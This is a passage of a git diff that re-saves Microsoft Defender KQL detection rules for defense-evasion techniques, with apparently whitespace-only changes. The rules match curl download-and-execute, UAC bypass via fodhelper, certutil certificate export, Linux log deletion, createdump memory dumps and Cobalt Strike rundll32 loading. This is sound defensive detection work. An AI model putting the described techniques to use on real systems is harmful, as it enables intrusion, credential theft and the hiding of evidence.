"\\BitLockerToGo.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/browser_execution_in_headless_mode.kql b/KQL/rules/Defense Evasion/browser_execution_in_headless_mode.kql index bafc18f9..1d465f67 100644 --- a/KQL/rules/Defense Evasion/browser_execution_in_headless_mode.kql +++ b/KQL/rules/Defense Evasion/browser_execution_in_headless_mode.kql @@ -1,10 +1,10 @@ -// Title: Browser Execution In Headless Mode -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-09-12 -// Level: low -// Description: Detects execution of Chromium based browser in headless mode -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.command-and-control, attack.t1105, attack.t1564.003 - -DeviceProcessEvents +// Title: Browser Execution In Headless Mode +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-12 +// Level: low +// Description: Detects execution of Chromium based browser in headless mode +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.command-and-control, attack.t1105, attack.t1564.003 + +DeviceProcessEvents | where ProcessCommandLine contains "--headless" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/bypass_uac_via_fodhelper_exe.kql b/KQL/rules/Defense Evasion/bypass_uac_via_fodhelper_exe.kql index 5636a175..d66ad7d9 100644 --- a/KQL/rules/Defense Evasion/bypass_uac_via_fodhelper_exe.kql +++ b/KQL/rules/Defense Evasion/bypass_uac_via_fodhelper_exe.kql @@ -1,12 +1,12 @@ -// Title: Bypass UAC via Fodhelper.exe -// Author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community -// Date: 2019-10-24 -// Level: high -// Description: Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 -// False Positives: -// - Legitimate use of fodhelper.exe utility by legitimate user - -DeviceProcessEvents +// Title: Bypass UAC via Fodhelper.exe +// Author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community +// Date: 2019-10-24 +// Level: high +// Description: Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 +// False Positives: +// - Legitimate use of fodhelper.exe utility by legitimate user + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\fodhelper.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/c_il_code_compilation_via_ilasm_exe.kql b/KQL/rules/Defense Evasion/c_il_code_compilation_via_ilasm_exe.kql index faa662bb..9d20434b 100644 --- a/KQL/rules/Defense Evasion/c_il_code_compilation_via_ilasm_exe.kql +++ b/KQL/rules/Defense Evasion/c_il_code_compilation_via_ilasm_exe.kql @@ -1,10 +1,10 @@ -// Title: C# IL Code Compilation Via Ilasm.EXE -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-05-07 -// Level: medium -// Description: Detects the use of "Ilasm.EXE" in order to compile C# intermediate (IL) code to EXE or DLL. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1127 - -DeviceProcessEvents +// Title: C# IL Code Compilation Via Ilasm.EXE +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-05-07 +// Level: medium +// Description: Detects the use of "Ilasm.EXE" in order to compile C# intermediate (IL) code to EXE or DLL. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1127 + +DeviceProcessEvents | where (ProcessCommandLine contains " /dll" or ProcessCommandLine contains " /exe") and (FolderPath endswith "\\ilasm.exe" or ProcessVersionInfoOriginalFileName =~ "ilasm.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/certificate_exported_via_certutil_exe.kql b/KQL/rules/Defense Evasion/certificate_exported_via_certutil_exe.kql index 2ad75a9a..21202da4 100644 --- a/KQL/rules/Defense Evasion/certificate_exported_via_certutil_exe.kql +++ b/KQL/rules/Defense Evasion/certificate_exported_via_certutil_exe.kql @@ -1,12 +1,12 @@ -// Title: Certificate Exported Via Certutil.EXE -// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-02-15 -// Level: medium -// Description: Detects the execution of the certutil with the "exportPFX" flag which allows the utility to export certificates. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027 -// False Positives: -// - There legitimate reasons to export certificates. Investigate the activity to determine if it's benign - -DeviceProcessEvents +// Title: Certificate Exported Via Certutil.EXE +// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-15 +// Level: medium +// Description: Detects the execution of the certutil with the "exportPFX" flag which allows the utility to export certificates. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027 +// False Positives: +// - There legitimate reasons to export certificates. Investigate the activity to determine if it's benign + +DeviceProcessEvents | where (ProcessCommandLine contains "-exportPFX " or ProcessCommandLine contains "/exportPFX " or ProcessCommandLine contains "–exportPFX " or ProcessCommandLine contains "—exportPFX " or ProcessCommandLine contains "―exportPFX ") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/change_winevt_channel_access_permission_via_registry.kql b/KQL/rules/Defense Evasion/change_winevt_channel_access_permission_via_registry.kql index f4122fad..ddc96723 100644 --- a/KQL/rules/Defense Evasion/change_winevt_channel_access_permission_via_registry.kql +++ b/KQL/rules/Defense Evasion/change_winevt_channel_access_permission_via_registry.kql @@ -1,10 +1,10 @@ -// Title: Change Winevt Channel Access Permission Via Registry -// Author: frack113 -// Date: 2022-09-17 -// Level: high -// Description: Detects tampering with the "ChannelAccess" registry key in order to change access to Windows event channel. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.002 - -DeviceRegistryEvents +// Title: Change Winevt Channel Access Permission Via Registry +// Author: frack113 +// Date: 2022-09-17 +// Level: high +// Description: Detects tampering with the "ChannelAccess" registry key in order to change access to Windows event channel. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.002 + +DeviceRegistryEvents | where ((RegistryValueData contains "(A;;0x1;;;LA)" or RegistryValueData contains "(A;;0x1;;;SY)" or RegistryValueData contains "(A;;0x5;;;BA)") and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels*" and RegistryKey endswith "\\ChannelAccess") and (not(((InitiatingProcessFolderPath endswith "\\TiWorker.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\servicing\\TrustedInstaller.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/chmod_suspicious_directory.kql b/KQL/rules/Defense Evasion/chmod_suspicious_directory.kql index 7662daa6..12946f6c 100644 --- a/KQL/rules/Defense Evasion/chmod_suspicious_directory.kql +++ b/KQL/rules/Defense Evasion/chmod_suspicious_directory.kql @@ -1,12 +1,12 @@ -// Title: Chmod Suspicious Directory -// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io -// Date: 2022-06-03 -// Level: medium -// Description: Detects chmod targeting files in abnormal directory paths. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1222.002 -// False Positives: -// - Admin changing file permissions. - -DeviceProcessEvents +// Title: Chmod Suspicious Directory +// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io +// Date: 2022-06-03 +// Level: medium +// Description: Detects chmod targeting files in abnormal directory paths. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1222.002 +// False Positives: +// - Admin changing file permissions. + +DeviceProcessEvents | where (ProcessCommandLine contains "/tmp/" or ProcessCommandLine contains "/.Library/" or ProcessCommandLine contains "/etc/" or ProcessCommandLine contains "/opt/") and FolderPath endswith "/chmod" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/clear_linux_logs.kql b/KQL/rules/Defense Evasion/clear_linux_logs.kql index 6097fa76..b7eb3b14 100644 --- a/KQL/rules/Defense Evasion/clear_linux_logs.kql +++ b/KQL/rules/Defense Evasion/clear_linux_logs.kql @@ -1,12 +1,12 @@ -// Title: Clear Linux Logs -// Author: Ömer Günal, oscd.community -// Date: 2020-10-07 -// Level: medium -// Description: Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070.002 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: Clear Linux Logs +// Author: Ömer Günal, oscd.community +// Date: 2020-10-07 +// Level: medium +// Description: Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.002 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where (ProcessCommandLine contains "/var/log" or ProcessCommandLine contains "/var/spool/mail") and (FolderPath endswith "/rm" or FolderPath endswith "/shred" or FolderPath endswith "/unlink") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/cmstp_execution_process_creation.kql b/KQL/rules/Defense Evasion/cmstp_execution_process_creation.kql index f5cd1660..223ba1a2 100644 --- a/KQL/rules/Defense Evasion/cmstp_execution_process_creation.kql +++ b/KQL/rules/Defense Evasion/cmstp_execution_process_creation.kql @@ -1,12 +1,12 @@ -// Title: CMSTP Execution Process Creation -// Author: Nik Seetharaman -// Date: 2018-07-16 -// Level: high -// Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1218.003, attack.g0069, car.2019-04-001 -// False Positives: -// - Legitimate CMSTP use (unlikely in modern enterprise environments) - -DeviceProcessEvents +// Title: CMSTP Execution Process Creation +// Author: Nik Seetharaman +// Date: 2018-07-16 +// Level: high +// Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218.003, attack.g0069, car.2019-04-001 +// False Positives: +// - Legitimate CMSTP use (unlikely in modern enterprise environments) + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\cmstp.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/cmstp_execution_registry_event.kql b/KQL/rules/Defense Evasion/cmstp_execution_registry_event.kql index 08f66879..a8ef67ad 100644 --- a/KQL/rules/Defense Evasion/cmstp_execution_registry_event.kql +++ b/KQL/rules/Defense Evasion/cmstp_execution_registry_event.kql @@ -1,12 +1,12 @@ -// Title: CMSTP Execution Registry Event -// Author: Nik Seetharaman -// Date: 2018-07-16 -// Level: high -// Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1218.003, attack.g0069, car.2019-04-001 -// False Positives: -// - Legitimate CMSTP use (unlikely in modern enterprise environments) - -DeviceRegistryEvents +// Title: CMSTP Execution Registry Event +// Author: Nik Seetharaman +// Date: 2018-07-16 +// Level: high +// Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218.003, attack.g0069, car.2019-04-001 +// False Positives: +// - Legitimate CMSTP use (unlikely in modern enterprise environments) + +DeviceRegistryEvents | where RegistryKey contains "\\cmmgr32.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/cobaltstrike_load_by_rundll32.kql b/KQL/rules/Defense Evasion/cobaltstrike_load_by_rundll32.kql index 262dc233..3d9c8427 100644 --- a/KQL/rules/Defense Evasion/cobaltstrike_load_by_rundll32.kql +++ b/KQL/rules/Defense Evasion/cobaltstrike_load_by_rundll32.kql @@ -1,10 +1,10 @@ -// Title: CobaltStrike Load by Rundll32 -// Author: Wojciech Lesicki -// Date: 2021-06-01 -// Level: high -// Description: Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.011 - -DeviceProcessEvents +// Title: CobaltStrike Load by Rundll32 +// Author: Wojciech Lesicki +// Date: 2021-06-01 +// Level: high +// Description: Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 + +DeviceProcessEvents | where (ProcessCommandLine contains ".dll" and (ProcessCommandLine endswith " StartW" or ProcessCommandLine endswith ",StartW")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or (ProcessCommandLine contains "rundll32.exe" or ProcessCommandLine contains "rundll32 ")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/code_execution_via_pcwutl_dll.kql b/KQL/rules/Defense Evasion/code_execution_via_pcwutl_dll.kql index e6facada..e4e47e90 100644 --- a/KQL/rules/Defense Evasion/code_execution_via_pcwutl_dll.kql +++ b/KQL/rules/Defense Evasion/code_execution_via_pcwutl_dll.kql @@ -1,12 +1,12 @@ -// Title: Code Execution via Pcwutl.dll -// Author: Julia Fomina, oscd.community -// Date: 2020-10-05 -// Level: medium -// Description: Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.011 -// False Positives: -// - Use of Program Compatibility Troubleshooter Helper - -DeviceProcessEvents +// Title: Code Execution via Pcwutl.dll +// Author: Julia Fomina, oscd.community +// Date: 2020-10-05 +// Level: medium +// Description: Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 +// False Positives: +// - Use of Program Compatibility Troubleshooter Helper + +DeviceProcessEvents | where (ProcessCommandLine contains "pcwutl" and ProcessCommandLine contains "LaunchApplication") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/codepage_modification_via_mode_com_to_russian_language.kql b/KQL/rules/Defense Evasion/codepage_modification_via_mode_com_to_russian_language.kql index 7b0293cc..f6a05000 100644 --- a/KQL/rules/Defense Evasion/codepage_modification_via_mode_com_to_russian_language.kql +++ b/KQL/rules/Defense Evasion/codepage_modification_via_mode_com_to_russian_language.kql @@ -1,13 +1,13 @@ -// Title: CodePage Modification Via MODE.COM To Russian Language -// Author: Joseliyo Sanchez, @Joseliyo_Jstnk -// Date: 2024-01-17 -// Level: medium -// Description: Detects a CodePage modification using the "mode.com" utility to Russian language. -// This behavior has been used by threat actors behind Dharma ransomware. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036 -// False Positives: -// - Russian speaking people changing the CodePage - -DeviceProcessEvents +// Title: CodePage Modification Via MODE.COM To Russian Language +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2024-01-17 +// Level: medium +// Description: Detects a CodePage modification using the "mode.com" utility to Russian language. +// This behavior has been used by threat actors behind Dharma ransomware. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 +// False Positives: +// - Russian speaking people changing the CodePage + +DeviceProcessEvents | where ((ProcessCommandLine contains " con " and ProcessCommandLine contains " cp " and ProcessCommandLine contains " select=") and (ProcessCommandLine endswith "=1251" or ProcessCommandLine endswith "=866")) and (FolderPath endswith "\\mode.com" or ProcessVersionInfoOriginalFileName =~ "MODE.COM") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/com_object_execution_via_xwizard_exe.kql b/KQL/rules/Defense Evasion/com_object_execution_via_xwizard_exe.kql index dbdd9d4a..89f77414 100644 --- a/KQL/rules/Defense Evasion/com_object_execution_via_xwizard_exe.kql +++ b/KQL/rules/Defense Evasion/com_object_execution_via_xwizard_exe.kql @@ -1,11 +1,11 @@ -// Title: COM Object Execution via Xwizard.EXE -// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems) -// Date: 2020-10-07 -// Level: medium -// Description: Detects the execution of Xwizard tool with the "RunWizard" flag and a GUID like argument. -// This utility can be abused in order to run custom COM object created in the registry. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 - -DeviceProcessEvents +// Title: COM Object Execution via Xwizard.EXE +// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-10-07 +// Level: medium +// Description: Detects the execution of Xwizard tool with the "RunWizard" flag and a GUID like argument. +// This utility can be abused in order to run custom COM object created in the registry. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents | where ProcessCommandLine =~ "RunWizard" and ProcessCommandLine matches regex "\\{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\\}" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/connection_proxy.kql b/KQL/rules/Defense Evasion/connection_proxy.kql index 9ab632c3..2581351e 100644 --- a/KQL/rules/Defense Evasion/connection_proxy.kql +++ b/KQL/rules/Defense Evasion/connection_proxy.kql @@ -1,12 +1,12 @@ -// Title: Connection Proxy -// Author: Ömer Günal -// Date: 2020-06-17 -// Level: low -// Description: Detects setting proxy configuration -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.command-and-control, attack.t1090 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: Connection Proxy +// Author: Ömer Günal +// Date: 2020-06-17 +// Level: low +// Description: Detects setting proxy configuration +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.command-and-control, attack.t1090 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where ProcessCommandLine contains "http_proxy=" or ProcessCommandLine contains "https_proxy=" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/convertto_securestring_cmdlet_usage_via_commandline.kql b/KQL/rules/Defense Evasion/convertto_securestring_cmdlet_usage_via_commandline.kql index 297196f1..48e23c77 100644 --- a/KQL/rules/Defense Evasion/convertto_securestring_cmdlet_usage_via_commandline.kql +++ b/KQL/rules/Defense Evasion/convertto_securestring_cmdlet_usage_via_commandline.kql @@ -1,12 +1,12 @@ -// Title: ConvertTo-SecureString Cmdlet Usage Via CommandLine -// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton -// Date: 2020-10-11 -// Level: medium -// Description: Detects usage of the "ConvertTo-SecureString" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001 -// False Positives: -// - Legitimate use to pass password to different powershell commands - -DeviceProcessEvents +// Title: ConvertTo-SecureString Cmdlet Usage Via CommandLine +// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton +// Date: 2020-10-11 +// Level: medium +// Description: Detects usage of the "ConvertTo-SecureString" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001 +// False Positives: +// - Legitimate use to pass password to different powershell commands + +DeviceProcessEvents | where ProcessCommandLine contains "ConvertTo-SecureString" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/createdump_process_dump.kql b/KQL/rules/Defense Evasion/createdump_process_dump.kql index d76aab5b..bd04aae3 100644 --- a/KQL/rules/Defense Evasion/createdump_process_dump.kql +++ b/KQL/rules/Defense Evasion/createdump_process_dump.kql @@ -1,12 +1,12 @@ -// Title: CreateDump Process Dump -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-01-04 -// Level: high -// Description: Detects uses of the createdump.exe LOLOBIN utility to dump process memory -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access -// False Positives: -// - Command lines that use the same flags - -DeviceProcessEvents +// Title: CreateDump Process Dump +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-01-04 +// Level: high +// Description: Detects uses of the createdump.exe LOLOBIN utility to dump process memory +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access +// False Positives: +// - Command lines that use the same flags + +DeviceProcessEvents | where (ProcessCommandLine contains " -u " or ProcessCommandLine contains " --full " or ProcessCommandLine contains " -f " or ProcessCommandLine contains " --name " or ProcessCommandLine contains ".dmp ") and (FolderPath endswith "\\createdump.exe" or ProcessVersionInfoOriginalFileName =~ "FX_VER_INTERNALNAME_STR") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/creation_of_non_existent_system_dll.kql b/KQL/rules/Defense Evasion/creation_of_non_existent_system_dll.kql index 05e178b2..15ac98c8 100644 --- a/KQL/rules/Defense Evasion/creation_of_non_existent_system_dll.kql +++ b/KQL/rules/Defense Evasion/creation_of_non_existent_system_dll.kql @@ -1,11 +1,11 @@ -// Title: Creation Of Non-Existent System DLL -// Author: Nasreddine Bencherchali (Nextron Systems), fornotes -// Date: 2022-12-01 -// Level: medium -// Description: Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories). -// Usually this technique is used to achieve DLL hijacking. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 - -DeviceFileEvents +// Title: Creation Of Non-Existent System DLL +// Author: Nasreddine Bencherchali (Nextron Systems), fornotes +// Date: 2022-12-01 +// Level: medium +// Description: Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories). +// Usually this technique is used to achieve DLL hijacking. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 + +DeviceFileEvents | where FolderPath endswith ":\\Windows\\System32\\TSMSISrv.dll" or FolderPath endswith ":\\Windows\\System32\\TSVIPSrv.dll" or FolderPath endswith ":\\Windows\\System32\\wbem\\wbemcomn.dll" or FolderPath endswith ":\\Windows\\System32\\WLBSCTRL.dll" or FolderPath endswith ":\\Windows\\System32\\wow64log.dll" or FolderPath endswith ":\\Windows\\System32\\WptsExtensions.dll" or FolderPath endswith "\\SprintCSP.dll" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/curl_download_and_execute_combination.kql b/KQL/rules/Defense Evasion/curl_download_and_execute_combination.kql index fc6c6297..ead43930 100644 --- a/KQL/rules/Defense Evasion/curl_download_and_execute_combination.kql +++ b/KQL/rules/Defense Evasion/curl_download_and_execute_combination.kql @@ -1,10 +1,10 @@ -// Title: Curl Download And Execute Combination -// Author: Sreeman, Nasreddine Bencherchali (Nextron Systems) -// Date: 2020-01-13 -// Level: high -// Description: Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218, attack.command-and-control, attack.t1105 - -DeviceProcessEvents +// Title: Curl Download And Execute Combination +// Author: Sreeman, Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-01-13 +// Level: high +// Description: Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.command-and-control, attack.t1105 + +DeviceProcessEvents | where (ProcessCommandLine contains "curl " and ProcessCommandLine contains "http" and ProcessCommandLine contains "-o" and ProcessCommandLine contains "&") and (ProcessCommandLine contains " -c " or ProcessCommandLine contains " /c " or ProcessCommandLine contains " –c " or ProcessCommandLine contains " —c " or ProcessCommandLine contains " ―c ") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/custom_file_open_handler_executes_powershell.kql b/KQL/rules/Defense Evasion/custom_file_open_handler_executes_powershell.kql index 875b8de9..d4771fca 100644 --- a/KQL/rules/Defense Evasion/custom_file_open_handler_executes_powershell.kql +++ b/KQL/rules/Defense Evasion/custom_file_open_handler_executes_powershell.kql @@ -1,10 +1,10 @@ -// Title: Custom File Open Handler Executes PowerShell -// Author: CD_R0M_ -// Date: 2022-06-11 -// Level: high -// Description: Detects the abuse of custom file open handler, executing powershell -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1202 - -DeviceRegistryEvents +// Title: Custom File Open Handler Executes PowerShell +// Author: CD_R0M_ +// Date: 2022-06-11 +// Level: high +// Description: Detects the abuse of custom file open handler, executing powershell +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1202 + +DeviceRegistryEvents | where (RegistryValueData contains "powershell" and RegistryValueData contains "-command") and RegistryKey endswith "shell\\open\\command*" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/decode_base64_encoded_text.kql b/KQL/rules/Defense Evasion/decode_base64_encoded_text.kql index 8285cc90..354f3cb0 100644 --- a/KQL/rules/Defense Evasion/decode_base64_encoded_text.kql +++ b/KQL/rules/Defense Evasion/decode_base64_encoded_text.kql @@ -1,12 +1,12 @@ -// Title: Decode Base64 Encoded Text -// Author: Daniil Yugoslavskiy, oscd.community -// Date: 2020-10-19 -// Level: low -// Description: Detects usage of base64 utility to decode arbitrary base64-encoded text -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027 -// False Positives: -// - Legitimate activities - -DeviceProcessEvents +// Title: Decode Base64 Encoded Text +// Author: Daniil Yugoslavskiy, oscd.community +// Date: 2020-10-19 +// Level: low +// Description: Detects usage of base64 utility to decode arbitrary base64-encoded text +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027 +// False Positives: +// - Legitimate activities + +DeviceProcessEvents | where ProcessCommandLine contains "-d" and FolderPath endswith "/base64" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/decode_base64_encoded_text_macos.kql b/KQL/rules/Defense Evasion/decode_base64_encoded_text_macos.kql index 305525e0..3de0b28d 100644 --- a/KQL/rules/Defense Evasion/decode_base64_encoded_text_macos.kql +++ b/KQL/rules/Defense Evasion/decode_base64_encoded_text_macos.kql @@ -1,12 +1,12 @@ -// Title: Decode Base64 Encoded Text -MacOs -// Author: Daniil Yugoslavskiy, oscd.community -// Date: 2020-10-19 -// Level: low -// Description: Detects usage of base64 utility to decode arbitrary base64-encoded text -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027 -// False Positives: -// - Legitimate activities - -DeviceProcessEvents +// Title: Decode Base64 Encoded Text -MacOs +// Author: Daniil Yugoslavskiy, oscd.community +// Date: 2020-10-19 +// Level: low +// Description: Detects usage of base64 utility to decode arbitrary base64-encoded text +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027 +// False Positives: +// - Legitimate activities + +DeviceProcessEvents | where ProcessCommandLine contains "-d" and FolderPath =~ "/usr/bin/base64" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/delete_defender_scan_shellex_context_menu_registry_key.kql b/KQL/rules/Defense Evasion/delete_defender_scan_shellex_context_menu_registry_key.kql index 7598c0bf..4aefa0d1 100644 --- a/KQL/rules/Defense Evasion/delete_defender_scan_shellex_context_menu_registry_key.kql +++ b/KQL/rules/Defense Evasion/delete_defender_scan_shellex_context_menu_registry_key.kql @@ -1,12 +1,12 @@ -// Title: Delete Defender Scan ShellEx Context Menu Registry Key -// Author: Matt Anderson (Huntress) -// Date: 2025-07-11 -// Level: medium -// Description: Detects deletion of registry key that adds 'Scan with Defender' option in context menu. Attackers may use this to make it harder for users to scan files that are suspicious. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion -// False Positives: -// - Unlikely as this weakens defenses and normally would not be done even if using another AV. - -DeviceRegistryEvents +// Title: Delete Defender Scan ShellEx Context Menu Registry Key +// Author: Matt Anderson (Huntress) +// Date: 2025-07-11 +// Level: medium +// Description: Detects deletion of registry key that adds 'Scan with Defender' option in context menu. Attackers may use this to make it harder for users to scan files that are suspicious. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Unlikely as this weakens defenses and normally would not be done even if using another AV. + +DeviceRegistryEvents | where RegistryKey contains "shellex\\ContextMenuHandlers\\EPP" and (not((InitiatingProcessFolderPath endswith "\\MsMpEng.exe" and (InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/devicecredentialdeployment_execution.kql b/KQL/rules/Defense Evasion/devicecredentialdeployment_execution.kql index 6901b5b2..5f66dc20 100644 --- a/KQL/rules/Defense Evasion/devicecredentialdeployment_execution.kql +++ b/KQL/rules/Defense Evasion/devicecredentialdeployment_execution.kql @@ -1,12 +1,12 @@ -// Title: DeviceCredentialDeployment Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-19 -// Level: medium -// Description: Detects the execution of DeviceCredentialDeployment to hide a process from view. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, 